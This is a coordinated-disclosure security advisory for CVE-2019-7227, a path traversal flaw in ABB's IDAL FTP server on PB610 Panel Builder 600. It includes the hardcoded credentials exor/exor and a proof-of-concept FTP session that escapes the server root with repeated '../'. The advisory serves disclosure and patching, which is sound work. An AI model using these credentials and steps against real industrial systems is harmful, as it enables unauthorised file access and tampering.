Share
XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability  
========================================================================  
  
Identifiers  
-----------  
XL-19-008  
CVE-2019-7227  
ABBVU-IAMF-1902006  
  
  
CVSS Score  
----------  
7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)  
  
  
Affected vendor  
---------------  
ABB (new.abb.com)  
  
  
Credit  
------  
Eldar Marcussen - xen1thLabs - Software Labs  
  
  
Vulnerability summary  
---------------------  
The IDAL FTP server fails to ensure that directory change requests do not change to locations outside of the FTP servers root directory. An authenticated attacker can simply traverse outside the server root directory by changing the directory with "cd ..".  
  
  
Technical details  
-----------------  
An authenticated attacker can traverse to arbitrary directories on the hard disk and then use the FTP server functionality to download and upload files. An unauthenticated attacker can take advantage of the hardcoded or default credential pair exor/exor to become an authenticated attacker.  
  
Proof of concept  
----------------  
```  
ftp> open localhost 22  
Connected to WIN-542AQUCL4LD.  
220 Welcome to IDAL FTP server. READY.  
User (WIN-542AQUCL4LD:(none)): exor  
331 User name ok, need password.  
Password:  
230 User successfully logged in.  
550 CWD command failed. Directory not found.  
ftp> cd ../../../../../../../../../../../../../../../  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.ac  
150 Opening ASCII mode data connection for LIST.  
drwxrwxrwx 1 0 0 0 Dec 11 05:45 $Recycle.Bin  
-rwxrwxrwx 1 0 0 24 Jun 10 2009 autoexec.bat  
drwxrwxrwx 1 0 0 0 Dec 11 16:41 Boot  
-r--r--r-- 1 0 0 383562 Jul 14 2009 bootmgr  
-r--r--r-- 1 0 0 8192 Dec 11 16:41 BOOTSECT.BAK  
-rw-rw-rw- 1 0 0 10 Jun 10 2009 config.sys  
drwxrwxrwx 1 0 0 0 Jul 14 2009 Documents and Settings  
-rw-rw-rw- 1 0 0 -1074274304 Dec 11 12:36 pagefile.sys  
drwxrwxrwx 1 0 0 0 Jul 14 2009 PerfLogs  
dr-xr-xr-x 1 0 0 0 Dec 11 11:42 Program Files  
drwxrwxrwx 1 0 0 0 Dec 11 12:36 ProgramData  
drwxrwxrwx 1 0 0 0 Dec 11 05:44 Recovery  
-rw-rw-rw- 1 0 0 213 Dec 11 07:23 setup.log  
drwxrwxrwx 1 0 0 0 Dec 11 12:26 System Volume Information  
dr-xr-xr-x 1 0 0 0 Dec 11 05:44 Users  
drwxrwxrwx 1 0 0 0 Dec 11 07:20 Windows  
226 Transfer complete.  
ftp: 1009 bytes received in 0.01Seconds 100.90Kbytes/sec.  
ftp>  
```  
  
Affected systems  
----------------  
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367  
  
Solution  
--------  
Apply the patches and instructions from vendor:  
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch  
  
  
Disclosure timeline  
-------------------  
04/02/2019 - Contacted ABB requesting disclosure coordination  
05/02/2019 - Provided vulnerability details  
05/06/2019 - Patch available  
17/06/2019 - xen1thLabs public disclosure